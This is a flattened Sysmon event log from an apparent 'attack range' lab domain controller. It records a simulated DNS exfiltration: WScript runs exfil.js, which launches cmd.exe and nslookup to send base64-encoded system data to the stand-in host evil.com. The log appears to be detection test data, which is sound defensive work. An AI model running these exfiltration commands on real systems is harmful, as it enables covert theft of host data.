23542300x8000000000000000195329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.488{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgoa.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.441{2E1864BB-17AA-629A-373E-000000005F02}58967404C:\Windows\system32\conhost.exe{2E1864BB-17AA-629A-383E-000000005F02}5128C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.441{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.441{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.441{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.441{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-383E-000000005F02}5128C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.441{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.441{2E1864BB-17AA-629A-363E-000000005F02}72201648C:\Windows\system32\cmd.exe{2E1864BB-17AA-629A-383E-000000005F02}5128C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.442{2E1864BB-17AA-629A-383E-000000005F02}5128C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AA-629A-363E-000000005F02}7220C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgoa.tmp 2>&1 10341000x8000000000000000195320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.410{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AA-629A-373E-000000005F02}5896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.410{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AA-629A-373E-000000005F02}5896C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.408{2E1864BB-17AA-629A-373E-000000005F02}58967404C:\Windows\system32\conhost.exe{2E1864BB-17AA-629A-363E-000000005F02}7220C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.388{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-373E-000000005F02}5896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.373{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.373{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.373{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-363E-000000005F02}7220C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.373{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.373{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.373{2E1864BB-17A1-629A-783D-000000005F02}5552336C:\Windows\System32\WScript.exe{2E1864BB-17AA-629A-363E-000000005F02}7220C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.382{2E1864BB-17AA-629A-363E-000000005F02}7220C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgoa.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.373{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbqqcvcd.tmpMD5=2F8701F387AF2110E32408D0F4A242C3,SHA256=6A2A0ACD9892C9D73119665C3163E4FB9119D009FEA0026931DDF4E05E5C0E6D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.342{2E1864BB-17AA-629A-343E-000000005F02}64367344C:\Windows\system32\conhost.exe{2E1864BB-17AA-629A-353E-000000005F02}8028C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.326{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.326{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.326{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.326{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.326{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-353E-000000005F02}8028C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.326{2E1864BB-17AA-629A-333E-000000005F02}63042192C:\Windows\system32\cmd.exe{2E1864BB-17AA-629A-353E-000000005F02}8028C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.338{2E1864BB-17AA-629A-353E-000000005F02}8028C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AA-629A-333E-000000005F02}6304C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbqqcvcd.tmp 2>&1 10341000x8000000000000000195300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.310{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AA-629A-343E-000000005F02}6436C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.310{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AA-629A-343E-000000005F02}6436C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000195298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.309{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=514AF5E6AE759292719587AE3A3945B2,SHA256=F5C1387C1BCFA9AE6540504B7BAA30034D624DAF85B7614289DA3EAE3259D9D5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 